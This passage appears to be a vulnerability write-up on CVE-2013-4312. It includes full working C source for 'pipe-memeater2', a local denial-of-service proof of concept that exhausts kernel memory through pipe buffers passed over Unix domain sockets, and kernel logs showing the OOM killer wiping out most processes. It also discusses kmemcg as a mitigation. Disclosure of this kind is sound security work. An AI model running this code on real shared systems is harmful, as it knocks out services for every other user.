[  117.081905]  [<ffffffff810503f9>] ? finish_task_switch+0x49/0xb0
[  117.083564]  [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100
[  117.085189]  [<ffffffff810f6627>] __page_cache_alloc+0x87/0x90
[  117.086761]  [<ffffffff8110056b>] __do_page_cache_readahead+0xdb/0x210
[  117.088509]  [<ffffffff811006c1>] ra_submit+0x21/0x30
[  117.089867]  [<ffffffff810f7eb0>] filemap_fault+0x400/0x450
[  117.091370]  [<ffffffff81111c34>] __do_fault+0x54/0x550
[  117.092783]  [<ffffffff811148f5>] handle_mm_fault+0x1c5/0xce0
[  117.094331]  [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230
[  117.095809]  [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230
[  117.097269]  [<ffffffff8148817c>] do_page_fault+0x11c/0x320
[  117.098771]  [<ffffffff81484e35>] page_fault+0x25/0x30
[  117.100186] Mem-Info:
[  117.100828] Node 0 DMA per-cpu:
[  117.101721] CPU    0: hi:    0, btch:   1 usd:   0
[  117.103026] CPU    1: hi:    0, btch:   1 usd:   0
[  117.104324] CPU    2: hi:    0, btch:   1 usd:   0
[  117.105638] CPU    3: hi:    0, btch:   1 usd:   0
[  117.106938] Node 0 DMA32 per-cpu:
[  117.107901] CPU    0: hi:  186, btch:  31 usd:   0
[  117.109194] CPU    1: hi:  186, btch:  31 usd:   0
[  117.110416] CPU    2: hi:  186, btch:  31 usd:  60
[  117.111349] CPU    3: hi:  186, btch:  31 usd:   0
[  117.112250] active_anon:108 inactive_anon:943 isolated_anon:0
[  117.112250]  active_file:12 inactive_file:26 isolated_file:0
[  117.112251]  unevictable:0 dirty:0 writeback:0 unstable:0
[  117.112251]  free:3440 slab_reclaimable:3789 slab_unreclaimable:22390
[  117.112252]  mapped:0 shmem:73 pagetables:199 bounce:0
[  117.117807] Node 0 DMA free:8064kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:24kB slab_unreclaimable:1044kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  117.124393] lowmem_reserve[]: 0 2004 2004 2004
[  117.125326] Node 0 DMA32 free:5696kB min:5708kB low:7132kB high:8560kB active_anon:432kB inactive_anon:3772kB active_file:48kB inactive_file:104kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:292kB slab_reclaimable:15132kB slab_unreclaimable:88516kB kernel_stack:1048kB pagetables:796kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:320 all_unreclaimable? yes
[  117.132331] lowmem_reserve[]: 0 0 0 0
[  117.133309] Node 0 DMA: 0*4kB 76*8kB 0*16kB 1*32kB 2*64kB 1*128kB 2*256kB 1*512kB 2*1024kB 2*2048kB 0*4096kB = 8064kB
[  117.135516] Node 0 DMA32: 699*4kB 1*8kB 6*16kB 2*32kB 2*64kB 1*128kB 0*256kB 1*512kB 0*1024kB 1*2048kB 0*4096kB = 5780kB
[  117.137807] 112 total pagecache pages
[  117.138501] 0 pages in swap cache
[  117.139134] Swap cache stats: add 0, delete 0, find 0/0
[  117.140090] Free swap  = 0kB
[  117.140602] Total swap = 0kB
[  117.143667] 524272 pages RAM
[  117.144630] 13239 pages reserved
[  117.145267] 275 pages shared
[  117.145895] 489349 pages non-shared
[  117.146529] [ pid ]   uid  tgid total_vm      rss cpu oom_adj name
[  117.147662] [    1]     0     1     4850       75   0       0 init
[  117.148883] [  423]     0   423     2767      200   0     -17 udevd
[  117.150166] [ 1086]     0  1086     2292      122   1       0 dhclient
[  117.151359] [ 1142]     0  1142     6399       59   0     -17 auditd
[  117.152556] [ 1285]     0  1285     5639       46   1       0 hald-addon-rfki
[  117.153910] [ 1293]     0  1293     5641       47   1       0 hald-addon-inpu
[  117.155214] [ 1317]     0  1317    16570      177   2     -17 sshd
[  117.156409] [ 1426]     0  1426     1028       21   2       0 mingetty
[  117.157610] [ 1428]     0  1428     1028       21   3       0 mingetty
[  117.158821] [ 1430]     0  1430     1032       21   0       0 agetty
[  117.160054] [ 1431]     0  1431     1028       21   1       0 mingetty
[  117.161282] [ 1433]     0  1433     1028       20   1       0 mingetty
[  117.162468] [ 1435]     0  1435     1028       21   2       0 mingetty
[  117.163692] [ 1437]     0  1437     2683      116   3     -17 udevd
[  117.164843] [ 1438]     0  1438     2683      116   2     -17 udevd
[  117.166093] [ 1694]   500  1694      993       19   2       0 pipe-memeater
[  117.167424] [ 1695]   500  1695      993       19   2       0 pipe-memeater
[  117.168767] [ 1697]     0  1697     1028       20   3       0 mingetty
[  117.170007] Out of memory: kill process 1694 (pipe-memeater) score 993 or a child
[  117.171449] Killed process 1694 (pipe-memeater) vsz:3972kB, anon-rss:76kB, file-rss:0kB
[kumaneko@localhost ~]$ pstree -pA
init(1)-+-agetty(1430)
        |-auditd(1142)---{auditd}(1143)
        |-dhclient(1086)
        |-hald-addon-inpu(1293)
        |-hald-addon-rfki(1285)
        |-mingetty(1426)
        |-mingetty(1428)
        |-mingetty(1431)
        |-mingetty(1433)
        |-mingetty(1435)
        |-mingetty(1697)
        |-pipe-memeater(1695)
        |-sshd(1317)---sshd(1770)---sshd(1772)---bash(1773)---pstree(1790)
        `-udevd(423)-+-udevd(1437)
                     `-udevd(1438)
[kumaneko@localhost ~]$
---------- Example output end ----------

Therefore, CVE-2013-4312 was assigned to this vulnerability.


2.2 How wide is the impact of this vulnerability?

"Well, TOMOYO 1.7's userspace tools had a function which passes file descriptors over a Unix domain socket. If I use a Unix domain socket, then I should be able to fill every file descriptor with a pipe and consume all memory for pipe buffers using only 1 process."

Experiment: What will happen if all file descriptors are filled with pipes?

---------- pipe-memeater2.c ----------
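#include <stdio.h>
#include <string.h>     /* memmove() */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <fcntl.h>
#include <poll.h>
#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ (1024 + 7) /* Not visible in <fcntl.h> unless _GNU_SOURCE is defined. */
#endif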

/* Queue file descriptor fd on the peer of socket_fd as SCM_RIGHTS ancillary data. */
static int send_fd(int socket_fd, int fd) {
        struct msghdr msg = { };
        struct iovec iov = { "", 1 };
        char cmsg_buf[CMSG_SPACE(sizeof(int))];
        struct cmsghdr *cmsg = (struct cmsghdr *) cmsg_buf;
        msg.msg_iov = &iov;
        msg.msg_iovlen = 1;
        msg.msg_control = cmsg_buf;
        msg.msg_controllen = sizeof(cmsg_buf);
        cmsg->cmsg_level = SOL_SOCKET;
        cmsg->cmsg_type = SCM_RIGHTS;
        cmsg->cmsg_len = CMSG_LEN(sizeof(int));
        msg.msg_controllen = cmsg->cmsg_len;
        memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
        return sendmsg(socket_fd, &msg, MSG_DONTWAIT);
}

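int main(int argc, char *argv[])
{
        int fd;
        int socket_fd[2] = { EOF, EOF };
        /* Close inherited descriptors so that the whole descriptor table is free. */
        for (fd = 0; fd < 1024; fd++)
                close(fd);
        /* Start 10 idle children which set their oom_score_adj to 1 and sleep. */
        for (fd = 0; fd < 10; fd++)
                if (fork() == 0) {
                        fd = open("/proc/self/oom_score_adj", O_WRONLY);
                        write(fd, "1", 1);
                        close(fd);
                        while (1)
                                sleep(1);
                }
        /* Only the grandchild, running in a new session, continues from here. */
        if (fork() || fork() || setsid() == EOF)
                _exit(0);
        /* socket_fd[0] of this first pair is never closed. */
        if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd))
                _exit(0);
        fd = socket_fd[1];
        while (1) {
                /* Create the next socket pair and queue one end on the current socket. */
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd) ||
                        send_fd(fd, socket_fd[0]) == EOF)
                        break;
                while (1) {
                        static char buf[4096];
                        int ret;
                        int pipe_fd[2] = { EOF, EOF };
                        if (pipe(pipe_fd))
                                break;
                        /* The queued reference keeps the pipe alive after close() below. */
                        ret = send_fd(fd, pipe_fd[0]);
                        if (argc == 1) {
                                /* Grow the pipe buffer to 1MB and fill it without blocking. */
                                fcntl(pipe_fd[1], F_SETPIPE_SZ, 1048576);
                                fcntl(pipe_fd[1], F_SETFL, O_NONBLOCK | fcntl(pipe_fd[1], F_GETFL));
                                while (write(pipe_fd[1], buf, sizeof(buf)) == sizeof(buf));
                        }
                        close(pipe_fd[1]);
                        close(pipe_fd[0]);
                        if (ret == EOF)
                                break;
                }
                /* Continue with the socket pair that was queued above. */
                close(socket_fd[0]);
                close(fd);
                fd = socket_fd[1];
        }
        /* When an argument is given, no data is written and the process stays alive. */
        if (argc != 1)
                while (1)
                        sleep(1);
        _exit(0);
}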
---------- pipe-memeater2.c ----------

Result: As expected, almost all processes are killed by the OOM killer.

---------- Example output start ----------
[kumaneko@localhost ~]$ pstree -pA
init(1)-+-NetworkManager(1271)
        |-agetty(1502)
        |-auditd(1207)---{auditd}(1208)
        |-bonobo-activati(1699)---{bonobo-activat}(1700)
        |-console-kit-dae(1510)-+-{console-kit-da}(1511)
        |                       |-{console-kit-da}(1512)
        |                       |-{console-kit-da}(1513)
        |                       |-{console-kit-da}(1514)
        |                       |-{console-kit-da}(1515)
        |                       |-{console-kit-da}(1516)
        |                       |-{console-kit-da}(1517)
        |                       |-{console-kit-da}(1518)
        |                       |-{console-kit-da}(1519)
        |                       |-{console-kit-da}(1520)
        |                       |-{console-kit-da}(1521)
        |                       |-{console-kit-da}(1522)
        |                       |-{console-kit-da}(1523)
        |                       |-{console-kit-da}(1524)
        |                       |-{console-kit-da}(1525)
        |                       |-{console-kit-da}(1526)
        |                       |-{console-kit-da}(1527)
        |                       |-{console-kit-da}(1528)
        |                       |-{console-kit-da}(1529)
        |                       |-{console-kit-da}(1530)
        |                       |-{console-kit-da}(1531)
        |                       |-{console-kit-da}(1532)
        |                       |-{console-kit-da}(1533)
        |                       |-{console-kit-da}(1534)
        |                       |-{console-kit-da}(1535)
        |                       |-{console-kit-da}(1536)
        |                       |-{console-kit-da}(1537)
        |                       |-{console-kit-da}(1538)
        |                       |-{console-kit-da}(1539)
        |                       |-{console-kit-da}(1540)
        |                       |-{console-kit-da}(1541)
        |                       |-{console-kit-da}(1542)
        |                       |-{console-kit-da}(1543)
        |                       |-{console-kit-da}(1544)
        |                       |-{console-kit-da}(1545)
        |                       |-{console-kit-da}(1546)
        |                       |-{console-kit-da}(1547)
        |                       |-{console-kit-da}(1548)
        |                       |-{console-kit-da}(1549)
        |                       |-{console-kit-da}(1550)
        |                       |-{console-kit-da}(1551)
        |                       |-{console-kit-da}(1552)
        |                       |-{console-kit-da}(1553)
        |                       |-{console-kit-da}(1554)
        |                       |-{console-kit-da}(1555)
        |                       |-{console-kit-da}(1556)
        |                       |-{console-kit-da}(1557)
        |                       |-{console-kit-da}(1558)
        |                       |-{console-kit-da}(1559)
        |                       |-{console-kit-da}(1560)
        |                       |-{console-kit-da}(1561)
        |                       |-{console-kit-da}(1562)
        |                       |-{console-kit-da}(1563)
        |                       |-{console-kit-da}(1564)
        |                       |-{console-kit-da}(1565)
        |                       |-{console-kit-da}(1566)
        |                       |-{console-kit-da}(1567)
        |                       |-{console-kit-da}(1568)
        |                       |-{console-kit-da}(1569)
        |                       |-{console-kit-da}(1570)
        |                       |-{console-kit-da}(1571)
        |                       |-{console-kit-da}(1572)
        |                       `-{console-kit-da}(1574)
        |-crond(1476)
        |-dbus-daemon(1670)
        |-dbus-daemon(1258)
        |-dbus-launch(1669)
        |-devkit-power-da(1674)
        |-dhclient(1151)
        |-gconfd-2(1680)
        |-gdm-binary(1636)-+-gdm-simple-slav(1649)-+-Xorg(1652)
        |                  |                       |-gdm-session-wor(1730)
        |                  |                       |-gnome-session(1671)-+-at-spi-registry(1694)
        |                  |                       |                     |-gdm-simple-gree(1710)
        |                  |                       |                     |-gnome-power-man(1711)
        |                  |                       |                     |-metacity(1707)
        |                  |                       |                     |-polkit-gnome-au(1709)
        |                  |                       |                     `-{gnome-session}(1695)
        |                  |                       `-{gdm-simple-sla}(1653)
        |                  `-{gdm-binary}(1650)
        |-gnome-settings-(1697)---{gnome-settings}(1702)
        |-gvfsd(1706)
        |-hald(1310)-+-hald-runner(1311)-+-hald-addon-acpi(1366)
        |            |                   |-hald-addon-inpu(1359)
        |            |                   `-hald-addon-rfki(1349)
        |            `-{hald}(1312)
        |-login(1492)---bash(1577)
        |-master(1464)-+-pickup(1481)
        |              `-qmgr(1482)
        |-mingetty(1494)
        |-mingetty(1496)
        |-mingetty(1498)
        |-mingetty(1500)
        |-mingetty(1503)
        |-modem-manager(1275)
        |-notification-da(1716)
        |-polkitd(1714)
        |-pulseaudio(1723)---{pulseaudio}(1729)
        |-rsyslogd(1229)-+-{rsyslogd}(1230)
        |                |-{rsyslogd}(1231)
        |                `-{rsyslogd}(1233)
        |-rtkit-daemon(1725)-+-{rtkit-daemon}(1726)
        |                    `-{rtkit-daemon}(1727)
        |-sshd(1385)---sshd(1733)---sshd(1735)---bash(1736)---pstree(1753)
        |-udevd(487)-+-udevd(1507)
        |            `-udevd(1508)
        `-wpa_supplicant(1350)
[kumaneko@localhost ~]$ ./pipe-memeater2
(Omitting re-login operation)
[kumaneko@localhost ~]$ dmesg
[  132.693170] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0, oom_score_adj=0
[  132.695011] pipe-memeater2 cpuset=/ mems_allowed=0
[  132.695984] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1
[  132.697532] Call Trace:
[  132.698055]  [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0
[  132.699429]  [<ffffffff8112a950>] ? dump_header+0x90/0x1b0
[  132.700575]  [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70
[  132.701822]  [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0
[  132.702877]  [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120
[  132.704026]  [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0
[  132.705082]  [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950
[  132.706243]  [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110
[  132.707432]  [<ffffffff8119d274>] ? pipe_write+0x3c4/0x6b0
[  132.708457]  [<ffffffff81191f0a>] ? do_sync_write+0xfa/0x140
[  132.709525]  [<ffffffff81177f49>] ? ____cache_alloc_node+0x99/0x160
[  132.710684]  [<ffffffff810a1820>] ? autoremove_wake_function+0x0/0x40
[  132.712004]  [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160
[  132.712954]  [<ffffffff81232026>] ? security_file_permission+0x16/0x20
[  132.714140]  [<ffffffff81192208>] ? vfs_write+0xb8/0x1a0
[  132.715225]  [<ffffffff811936f6>] ? fget_light_pos+0x16/0x50
[  132.716293]  [<ffffffff81192d41>] ? sys_write+0x51/0xb0
[  132.717298]  [<ffffffff810e8c2e>] ? __audit_syscall_exit+0x25e/0x290
[  132.718554]  [<ffffffff8100b0d2>] ? system_call_fastpath+0x16/0x1b
[  132.719749] Mem-Info:
[  132.720206] Node 0 DMA per-cpu:
[  132.720817] CPU    0: hi:    0, btch:   1 usd:   0
[  132.721771] CPU    1: hi:    0, btch:   1 usd:   0
[  132.722666] CPU    2: hi:    0, btch:   1 usd:   0
[  132.723666] CPU    3: hi:    0, btch:   1 usd:   0
[  132.724652] Node 0 DMA32 per-cpu:
[  132.725328] CPU    0: hi:  186, btch:  31 usd:   0
[  132.726211] CPU    1: hi:  186, btch:  31 usd:  36
[  132.727161] CPU    2: hi:  186, btch:  31 usd:   0
[  132.728076] CPU    3: hi:  186, btch:  31 usd:   3
[  132.728950] active_anon:14917 inactive_anon:249 isolated_anon:0
[  132.728951]  active_file:0 inactive_file:18 isolated_file:0
[  132.728951]  unevictable:0 dirty:8 writeback:0 unstable:0
[  132.728951]  free:13255 slab_reclaimable:7730 slab_unreclaimable:20346
[  132.728952]  mapped:281 shmem:306 pagetables:1876 bounce:0
[  132.734252] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:84kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  132.742139] lowmem_reserve[]: 0 2004 2004 2004
[  132.743187] Node 0 DMA32 free:44676kB min:44720kB low:55900kB high:67080kB active_anon:59668kB inactive_anon:996kB active_file:0kB inactive_file:72kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:32kB writeback:0kB mapped:1124kB shmem:1224kB slab_reclaimable:30836kB slab_unreclaimable:81132kB kernel_stack:4384kB pagetables:7504kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:191 all_unreclaimable? yes
[  132.750447] lowmem_reserve[]: 0 0 0 0
[  132.751251] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB
[  132.753469] Node 0 DMA32: 1595*4kB 865*8kB 431*16kB 241*32kB 130*64kB 34*128kB 2*256kB 1*512kB 1*1024kB 1*2048kB 0*4096kB = 44676kB
[  132.755994] 356 total pagecache pages
[  132.756679] 0 pages in swap cache
[  132.757295] Swap cache stats: add 0, delete 0, find 0/0
[  132.758283] Free swap  = 0kB
[  132.758803] Total swap = 0kB
[  132.761657] 524272 pages RAM
[  132.762296] 45689 pages reserved
[  132.762876] 1143 pages shared
[  132.763423] 459523 pages non-shared
[  132.764069] [ pid ]   uid  tgid total_vm      rss cpu oom_adj oom_score_adj name
[  132.765411] [  487]     0   487     2699      145   0     -17         -1000 udevd
[  132.766814] [ 1151]     0  1151     2280      123   1       0             0 dhclient
[  132.768201] [ 1207]     0  1207     6899       61   3     -17         -1000 auditd
[  132.769536] [ 1229]     0  1229    62271      648   3       0             0 rsyslogd
[  132.770997] [ 1258]    81  1258     5459      168   2       0             0 dbus-daemon
[  132.772434] [ 1271]     0  1271    20705      222   3       0             0 NetworkManager
[  132.773961] [ 1275]     0  1275    14530      124   3       0             0 modem-manager
[  132.775459] [ 1310]    68  1310     9588      292   3       0             0 hald
[  132.776834] [ 1311]     0  1311     5099       55   3       0             0 hald-runner
[  132.778298] [ 1349]     0  1349     5627       46   1       0             0 hald-addon-rfki
[  132.779789] [ 1350]     0  1350    11247      134   0       0             0 wpa_supplicant
[  132.781244] [ 1359]     0  1359     5629       46   3       0             0 hald-addon-inpu
[  132.782802] [ 1366]    68  1366     4501       41   1       0             0 hald-addon-acpi
[  132.784277] [ 1385]     0  1385    16558      177   0     -17         -1000 sshd
[  132.785665] [ 1464]     0  1464    20222      226   3       0             0 master
[  132.787005] [ 1476]     0  1476    29216      153   0       0             0 crond
[  132.788365] [ 1481]    89  1481    20242      218   2       0             0 pickup
[  132.789833] [ 1482]    89  1482    20259      219   0       0             0 qmgr
[  132.791187] [ 1492]     0  1492    17403      127   1       0             0 login
[  132.792555] [ 1494]     0  1494     1016       21   0       0             0 mingetty
[  132.794302] [ 1496]     0  1496     1016       21   0       0             0 mingetty
[  132.795719] [ 1498]     0  1498     1016       22   0       0             0 mingetty
[  132.797089] [ 1500]     0  1500     1016       22   0       0             0 mingetty
[  132.798541] [ 1502]     0  1502     1020       23   0       0             0 agetty
[  132.799880] [ 1503]     0  1503     1016       20   0       0             0 mingetty
[  132.801484] [ 1507]     0  1507     2698      144   2     -17         -1000 udevd
[  132.802964] [ 1508]     0  1508     2698      144   0     -17         -1000 udevd
[  132.804308] [ 1510]     0  1510   521256      341   3       0             0 console-kit-dae
[  132.805966] [ 1577]     0  1577    27076       95   2       0             0 bash
[  132.807295] [ 1636]     0  1636    33501       81   0       0             0 gdm-binary
[  132.808710] [ 1649]     0  1649    41156      153   3       0             0 gdm-simple-slav
[  132.810269] [ 1652]     0  1652    42840     4384   3       0             0 Xorg
[  132.811594] [ 1669]    42  1669     5009       66   2       0             0 dbus-launch
[  132.813061] [ 1670]    42  1670     5390       86   3       0             0 dbus-daemon
[  132.814495] [ 1671]    42  1671    67289      479   1       0             0 gnome-session
[  132.815956] [ 1674]     0  1674    12490      161   3       0             0 devkit-power-da
[  132.817561] [ 1680]    42  1680    33055      539   3       0             0 gconfd-2
[  132.819058] [ 1694]    42  1694    30175      292   0       0             0 at-spi-registry
[  132.820530] [ 1697]    42  1697    86838      958   1       0             0 gnome-settings-
[  132.822181] [ 1699]    42  1699    89636      197   1       0             0 bonobo-activati
[  132.823653] [ 1706]    42  1706    33819       82   1       0             0 gvfsd
[  132.825062] [ 1707]    42  1707    71453      682   1       0             0 metacity
[  132.826434] [ 1709]    42  1709    62076      443   0       0             0 polkit-gnome-au
[  132.827924] [ 1710]    42  1710    95132     1239   3       0             0 gdm-simple-gree
[  132.829457] [ 1711]    42  1711    68423      516   3       0             0 gnome-power-man
[  132.830948] [ 1714]     0  1714    13157      303   2       0             0 polkitd
[  132.832303] [ 1723]    42  1723    86434      201   2       0             0 pulseaudio
[  132.833781] [ 1725]   498  1725    42113       53   2       0             0 rtkit-daemon
[  132.835231] [ 1730]     0  1730    35441       95   3       0             0 gdm-session-wor
[  132.836776] [ 1733]     0  1733    25629      255   0       0             0 sshd
[  132.838102] [ 1735]   500  1735    25629      256   0       0             0 sshd
[  132.839429] [ 1736]   500  1736    27076       94   2       0             0 bash
[  132.840851] [ 1755]   500  1755      981       20   3       0             1 pipe-memeater2
[  132.842372] [ 1756]   500  1756      981       20   0       0             1 pipe-memeater2
[  132.843858] [ 1757]   500  1757      981       20   1       0             1 pipe-memeater2
[  132.845384] [ 1758]   500  1758      981       20   3       0             1 pipe-memeater2
[  132.846866] [ 1759]   500  1759      981       20   0       0             1 pipe-memeater2
[  132.848426] [ 1760]   500  1760      981       20   1       0             1 pipe-memeater2
[  132.850046] [ 1761]   500  1761      981       20   0       0             1 pipe-memeater2
[  132.851526] [ 1762]   500  1762      981       20   3       0             1 pipe-memeater2
[  132.853038] [ 1763]   500  1763      981       20   0       0             1 pipe-memeater2
[  132.854517] [ 1764]   500  1764      981       20   1       0             1 pipe-memeater2
[  132.856059] [ 1766]   500  1766      981       20   1       0             0 pipe-memeater2
[  132.857548] Out of memory: Kill process 1697 (gnome-settings-) score 2 or sacrifice child
[  132.859015] Killed process 1697, UID 42, (gnome-settings-) total-vm:347352kB, anon-rss:3252kB, file-rss:580kB
(Omitting repetitions)
[  137.704574] pipe-memeater2 invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0, oom_score_adj=0
[  137.707278] pipe-memeater2 cpuset=/ mems_allowed=0
[  137.708516] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1
[  137.710327] Call Trace:
[  137.711014]  [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0
[  137.712503]  [<ffffffff8112a950>] ? dump_header+0x90/0x1b0
[  137.713895]  [<ffffffff8153c797>] ? _spin_unlock_irqrestore+0x17/0x20
[  137.715475]  [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0
[  137.716797]  [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120
[  137.718171]  [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0
[  137.719466]  [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950
[  137.720710]  [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110
[  137.721864]  [<ffffffff81127d47>] ? __page_cache_alloc+0x87/0x90
[  137.723103]  [<ffffffff8112772e>] ? find_get_page+0x1e/0xa0
[  137.724195]  [<ffffffff81128ce7>] ? filemap_fault+0x1a7/0x500
[  137.725370]  [<ffffffff811522c4>] ? __do_fault+0x54/0x530
[  137.726422]  [<ffffffff8107ed47>] ? current_fs_time+0x27/0x30
[  137.727569]  [<ffffffff81152897>] ? handle_pte_fault+0xf7/0xb20
[  137.728774]  [<ffffffff8119d1da>] ? pipe_write+0x32a/0x6b0
[  137.730021]  [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0
[  137.731316]  [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500
[  137.732674]  [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160
[  137.733747]  [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0
[  137.735073]  [<ffffffff8153cc55>] ? page_fault+0x25/0x30
[  137.736314] Mem-Info:
[  137.737119] Node 0 DMA per-cpu:
[  137.738204] CPU    0: hi:    0, btch:   1 usd:   0
[  137.739307] CPU    1: hi:    0, btch:   1 usd:   0
[  137.740428] CPU    2: hi:    0, btch:   1 usd:   0
[  137.741553] CPU    3: hi:    0, btch:   1 usd:   0
[  137.742553] Node 0 DMA32 per-cpu:
[  137.743233] CPU    0: hi:  186, btch:  31 usd:   4
[  137.745237] CPU    1: hi:  186, btch:  31 usd:   0
[  137.746208] CPU    2: hi:  186, btch:  31 usd:   0
[  137.747148] CPU    3: hi:  186, btch:  31 usd:   0
[  137.748115] active_anon:634 inactive_anon:18 isolated_anon:0
[  137.748115]  active_file:0 inactive_file:96 isolated_file:0
[  137.748116]  unevictable:0 dirty:0 writeback:0 unstable:0
[  137.748116]  free:13318 slab_reclaimable:7641 slab_unreclaimable:20767
[  137.748117]  mapped:21 shmem:75 pagetables:118 bounce:0
[  137.753688] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:92kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  137.760653] lowmem_reserve[]: 0 2004 2004 2004
[  137.761734] Node 0 DMA32 free:44928kB min:44720kB low:55900kB high:67080kB active_anon:2536kB inactive_anon:72kB active_file:0kB inactive_file:384kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:84kB shmem:300kB slab_reclaimable:30472kB slab_unreclaimable:82816kB kernel_stack:2928kB pagetables:472kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  137.769505] lowmem_reserve[]: 0 0 0 0
[  137.770383] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB
[  137.772807] Node 0 DMA32: 810*4kB 612*8kB 293*16kB 185*32kB 99*64kB 50*128kB 15*256kB 9*512kB 3*1024kB 1*2048kB 0*4096kB = 45048kB
[  137.775481] 239 total pagecache pages
[  137.776214] 0 pages in swap cache
[  137.776877] Swap cache stats: add 0, delete 0, find 0/0
[  137.777916] Free swap  = 0kB
[  137.778504] Total swap = 0kB
[  137.781695] 524272 pages RAM
[  137.782347] 45689 pages reserved
[  137.783046] 314 pages shared
[  137.783631] 460183 pages non-shared
[  137.784339] [ pid ]   uid  tgid total_vm      rss cpu oom_adj oom_score_adj name
[  137.785819] [  487]     0   487     2699      145   0     -17         -1000 udevd
[  137.787313] [ 1207]     0  1207     6899       61   3     -17         -1000 auditd
[  137.788720] [ 1385]     0  1385    16558      177   0     -17         -1000 sshd
[  137.790073] [ 1507]     0  1507     2698      144   2     -17         -1000 udevd
[  137.791486] [ 1508]     0  1508     2698      144   0     -17         -1000 udevd
[  137.792912] [ 1766]   500  1766      981       20   3       0             0 pipe-memeater2
[  137.794509] Out of memory: Kill process 1766 (pipe-memeater2) score 1 or sacrifice child
[  137.796076] Killed process 1766, UID 500, (pipe-memeater2) total-vm:3924kB, anon-rss:80kB, file-rss:0kB
[kumaneko@localhost ~]$ pstree -pA
init(1)-+-agetty(1777)
        |-auditd(1207)---{auditd}(1208)
        |-mingetty(1768)
        |-mingetty(1769)
        |-mingetty(1770)
        |-mingetty(1771)
        |-mingetty(1772)
        |-mingetty(1773)
        |-sshd(1385)---sshd(1856)---sshd(1858)---bash(1859)---pstree(1877)
        `-udevd(487)-+-udevd(1507)
                     `-udevd(1508)
[kumaneko@localhost ~]$
---------- Example output end ----------

This means that this DoS attack succeeds not only on Linux 2.6.35 and later (which contain the patch in question) but also on kernels as old as Linux 2.0 (which was released in June 1996 and which already supports passing file descriptors using Unix domain sockets).

  →All currently running Linux systems are affected.


2.3 What mitigation is possible for this vulnerability?

On Linux 3.8 and later (which support kmemcg as part of the memory cgroup functionality), kernel memory usage such as pipe buffers can be restricted, provided that kmemcg is configured appropriately.

But there is no mitigation on Linux 3.7 and earlier (which do not support kmemcg), or when kmemcg is not configured.

  →How many of the systems that allow execution of user-defined programs actually configure kmemcg?
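
For reference, configuring kmemcg on a cgroup v1 system roughly means writing a limit to the memory.kmem.limit_in_bytes file of a memory cgroup and then putting the untrusted processes into that group. Below is a minimal sketch of those two steps. The function name configure_kmem_limit, the group name "untrusted" and the 64MB value are made up for illustration, and the demo writes to a scratch directory rather than to the real hierarchy (usually mounted at /sys/fs/cgroup/memory, which is an assumption about your system). As far as I understand, on kernels of this era the limit has to be set before any process joins the group, so the sketch writes the limit first.

```python
import os
import tempfile


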